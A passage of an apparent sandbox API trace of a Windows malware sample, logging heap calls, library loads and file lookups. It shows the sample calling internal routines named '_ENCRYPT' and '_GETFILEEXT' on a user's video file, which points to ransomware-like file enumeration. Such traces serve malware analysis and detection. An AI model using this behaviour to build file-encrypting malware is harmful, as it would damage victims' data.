lpWideCharStr=0x0) returned 71 [0199.463] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8e) returned 0x8edfa0 [0199.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=71, lpWideCharStr=0x8edfa0, cchWideChar=71 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf") returned 71 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.464] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0199.465] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.465] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0199.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.467] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0199.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0199.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0199.467] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.467] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0199.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0199.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.468] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0199.468] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.469] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0199.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.469] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0199.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.469] CloseHandle (hObject=0x158) returned 1 [0199.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0199.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0199.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.470] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.471] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0199.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.471] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.471] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0199.471] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.471] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0199.471] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0199.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.472] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92ed7c0, ftCreationTime.dwHighDateTime=0x1d5de34, ftLastAccessTime.dwLowDateTime=0xb5fc0d50, ftLastAccessTime.dwHighDateTime=0x1d5e5ba, ftLastWriteTime.dwLowDateTime=0xb5fc0d50, ftLastWriteTime.dwHighDateTime=0x1d5e5ba, nFileSizeHigh=0x0, nFileSizeLow=0xb336, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IoPtJD0U8Gbyjv6.swf", cAlternateFileName="IOPTJD~1.SWF")) returned 0x90add8 [0199.472] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.472] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92ed7c0, ftCreationTime.dwHighDateTime=0x1d5de34, ftLastAccessTime.dwLowDateTime=0xb5fc0d50, ftLastAccessTime.dwHighDateTime=0x1d5e5ba, ftLastWriteTime.dwLowDateTime=0xb5fc0d50, ftLastWriteTime.dwHighDateTime=0x1d5e5ba, nFileSizeHigh=0x0, nFileSizeLow=0xb336, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="IoPtJD0U8Gbyjv6.swf", cAlternateFileName="IOPTJD~1.SWF")) returned 0x90add8 [0199.472] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.473] CompareStringW (Locale=0x400, 